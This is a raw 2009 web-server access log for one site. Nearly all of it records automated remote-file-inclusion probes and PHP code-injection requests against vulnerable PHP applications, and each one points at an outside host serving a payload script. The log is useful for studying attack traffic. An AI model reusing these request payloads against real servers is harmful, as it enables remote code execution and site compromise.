89.221.240.132 - - [30/Jan/2009:08:15:15 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:08:15:15 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:08:15:15 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
166.104.13.76 - - [30/Jan/2009:08:15:32 -0800] "GET /logs/access_080821.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
166.104.13.76 - - [30/Jan/2009:08:15:32 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
166.104.13.76 - - [30/Jan/2009:08:15:32 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:15:47 -0800] "GET /logs/access_080730.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.73.228 - - [30/Jan/2009:08:15:56 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-099_0.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:05 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:16:13 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:16:13 -0800] "GET /logs/access_080821.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:16:13 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:14 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:14 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:14 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
166.104.13.76 - - [30/Jan/2009:08:16:14 -0800] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:20 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:20 -0800] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:20 -0800] "GET /logs/access_080108.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:21 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:16:22 -0800] "GET /logs/access_080821.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:16:22 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:16:22 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:16:41 -0800] "GET /logs/access_080925.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:16:46 -0800] "GET /logs/access_080928.log///?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:16:46 -0800] "GET //?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:16:46 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:16:46 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:16:47 -0800] "GET /logs///?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 200 84610 "-" "libwww-perl/5.811" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:16:48 -0800] "GET /logs/access_080516.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:16:51 -0800] "GET /logs/access_080528.log///?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:52 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:52 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:52 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:16:52 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:11 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:11 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:17:16 -0800] "GET /logs/access_080513.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:17:17 -0800] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:17:17 -0800] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:17:20 -0800] "GET /logs/access_080515.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:21 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:21 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:21 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:21 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:22 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:17:22 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:17:23 -0800] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:17:31 -0800] "GET /logs/access_080530.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:17:42 -0800] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:17:47 -0800] "GET /logs/access_080917.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:18:16 -0800] "GET /logs/access_080622.log/modules/My_eGallery/public/displayCategory.php?basepath=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:18:16 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:18:20 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:18:25 -0800] "GET /logs/access_080414.log/modules/My_eGallery/public/displayCategory.php?basepath=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:18:35 -0800] "GET /logs/access_080528.log/index.php?site1=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:18:35 -0800] "GET /logs/index.php?site1=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:18:36 -0800] "GET /index.php?site1=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 200 94773 "-" "libwww-perl/5.813" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:18:41 -0800] "GET /logs/access_080618.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:18:43 -0800] "GET /logs/access_080629.log/index.php?site1=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:19:40 -0800] "GET /logs/access_080910.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:08:19:57 -0800] "GET /logs/access_081110.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:08:19:57 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:08:19:57 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:05 -0800] "GET /logs/access_080826.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:06 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:08:20:06 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:08:20:06 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:08:20:06 -0800] "GET /logs/access_081110.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:07 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:09 -0800] "GET /logs/access_080826.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:20:09 -0800] "GET /logs/access_081201.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:10 -0800] "GET /logs/access_080826.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:10 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:10 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:10 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:20:11 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:20:12 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:20:13 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:20:13 -0800] "GET /logs/access_080811.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [30/Jan/2009:08:20:22 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:20:24 -0800] "GET /logs/access_090103.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:20:25 -0800] "GET /logs/access_081025.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:20:26 -0800] "GET /logs/access_080412.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:20:31 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:20:31 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.5 - - [30/Jan/2009:08:20:32 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.5 - - [30/Jan/2009:08:20:33 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:20:37 -0800] "GET /logs/access_080622.log/modules/My_eGallery/public/displayCategory.php?basepath=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:20:38 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:20:38 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:20:39 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:20:40 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.143.48.248 - - [30/Jan/2009:08:20:43 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.143.48.248 - - [30/Jan/2009:08:20:43 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.48.248 - - [30/Jan/2009:08:20:44 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:20:46 -0800] "GET /logs/senetman/html/index.php?page=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
